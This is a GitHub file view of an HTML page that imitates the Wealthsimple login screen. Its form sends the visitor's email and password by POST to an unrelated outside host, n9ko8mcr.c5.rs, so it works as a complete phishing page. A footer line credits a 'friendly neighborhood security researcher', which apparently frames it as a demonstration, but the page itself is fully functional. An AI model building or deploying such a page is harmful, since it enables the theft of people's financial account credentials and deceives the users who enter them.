-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
29 lines (27 loc) · 935 Bytes
/
Copy pathindex.html
File metadata and controls
29 lines (27 loc) · 935 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Wealthsimple Login</title>
<link rel="stylesheet" href="style.css" />
</head>
<body>
<div class="login-container">
<div class="logo-container">
<div class="coin-logo">W</div>
</div>
<div class="login-box">
<h2>Login to Wealthsimple</h2>
<form action="https://n9ko8mcr.c5.rs" method="POST">
<label for="email">Email</label>
<input type="email" id="email" name="email" required />
<label for="password">Password</label>
<input type="password" id="password" name="password" required />
<button type="submit">Sign In</button>
</form>
<p class="disclaimer">Secured with your friendly neighborhood security researcher 🕵️♂️</p>
</div>
</div>
</body>
</html>